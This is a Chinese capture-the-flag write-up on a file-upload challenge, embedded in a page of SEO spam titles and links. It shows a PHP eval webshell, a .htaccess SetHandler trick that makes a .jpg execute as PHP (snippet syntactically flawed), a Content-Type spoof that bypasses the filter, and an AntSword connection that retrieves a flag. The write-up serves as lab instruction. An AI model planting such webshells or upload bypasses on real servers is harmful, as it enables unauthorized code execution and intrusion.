当前位置: 首页 > news >正文

5566网址大全设首页seo是什么职位

5566网址大全设首页,seo是什么职位,蒙古网站做奶食,wordpress自适移动题目环境&#xff1a; 不难看出是一道文件上传漏洞 上传一句话木马文件burpsuite进行抓包<?php eval($_POST[shell]);?> 命名为PHP文件格式 Repeater进行重放 尝试了其它后缀进行绕过都没有成功 通过 application/x-php内容类型&#xff0c;可以看出被识别出是PHP文件&…

题目环境:
image.png

不难看出是一道文件上传漏洞

上传一句话木马文件
burpsuite进行抓包
<?php @eval($_POST['shell']);?>

命名为PHP文件格式

image.png
Repeater进行重放
image.png
image.png

尝试了其它后缀进行绕过都没有成功
通过 application/x-php内容类型,可以看出被识别出是PHP文件,猜测作者使用了htaccess文件更改了相关配置

了解.htaccess文件

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
注意这几个字“改变文件扩展名”,后面会用到

尝试传入jpg文件(一句话木马不变)
回显结果是否会有所不同
image.png

发现上传成功
访问上传的文件
image.png
图片加载失败
到这里猜想使用中国蚁剑是连接不成功的
不过咱们还是按照正常程序走一遍比较好

使用中国蚁剑进行连接
image.png

返回数据为空
到这里我们的一句话木马并没有被识别出来,或者说并没有执行,猜测被拦截
尝试上传更改后的.htaccess文件

上传.htaccess文件

<FileMatch "1.jpg>
SetHandler application/x-httpd-php
</FileMatch>

上传的一句话木马文件要和1.jpg文件名一模一样
可以把这段代码理解为,将1.jpg文件内容当作PHP文件执行

image.png

发现被拦截了,更改内容类型为image/jpeg进行绕过

更改Content-Type内容类型为:image/jpeg
image.png

.htaccess文件上传成功

再次上传1.jpg的木马文件
image.png
image.png

上传成功
访问成功
尝试使用蚁剑进行连接

使用中国蚁剑进行连接
image.png
image.png
image.png
得到flag:
flag{11711c03-702e-43ac-b1fe-fec6c5297260}

http://www.khdw.cn/news/42387.html

相关文章:

  • wap网站制作app推动高质量发展
  • 网站优化排名优化百度seo搜索引擎优化
  • 安卓一键制作app软件搜索引擎优化涉及的内容
  • 设计做兼职最好的网站企业网络推广的方法有哪些
  • 做网络平台的网站整合营销案例
  • 沧州网站建设培训学校怎么做app推广和宣传
  • 山东网站建设报价教育机构培训
  • 自己做网站卖产品怎么样如何用模板做网站
  • 网站上做扫一扫iis搭建网站
  • 中小学建设网站seo实战培训学校
  • 成都网站建设科技免费外链发布
  • 教育网站建设方案模板网站开发流程有哪几个阶段
  • 济南微信网站开发seo营销课程培训
  • 广告公司可以做网站吗济南网络推广公司电话
  • 政府网站集约化建设能做什么广东新闻今日大件事
  • 网站建设 招标任务书百度人工客服24小时电话
  • 济南智能网站建设费用广告设计网站
  • 网站建设属那种营业app营销
  • 医药公司网站设计杭州seo建站
  • 网站ico添加投放广告找什么平台
  • 做外贸需要做个英文网站吗快手seo
  • 做国内第一游戏数据门户网站乐云seo官网
  • 宁波今天最新新闻头条seo广告优化
  • 佛山网站优化有哪些海外建站
  • 网站推广计划包括哪些创建网站平台
  • 建网站公建网站公司网站如何做关键词优化
  • 做外贸有哪些好的网站有哪些web网址
  • 最受欢迎的建站平台找回今日头条
  • 网站开发怎么做福州seo顾问
  • 荆州网站开发永久不收费免费的软件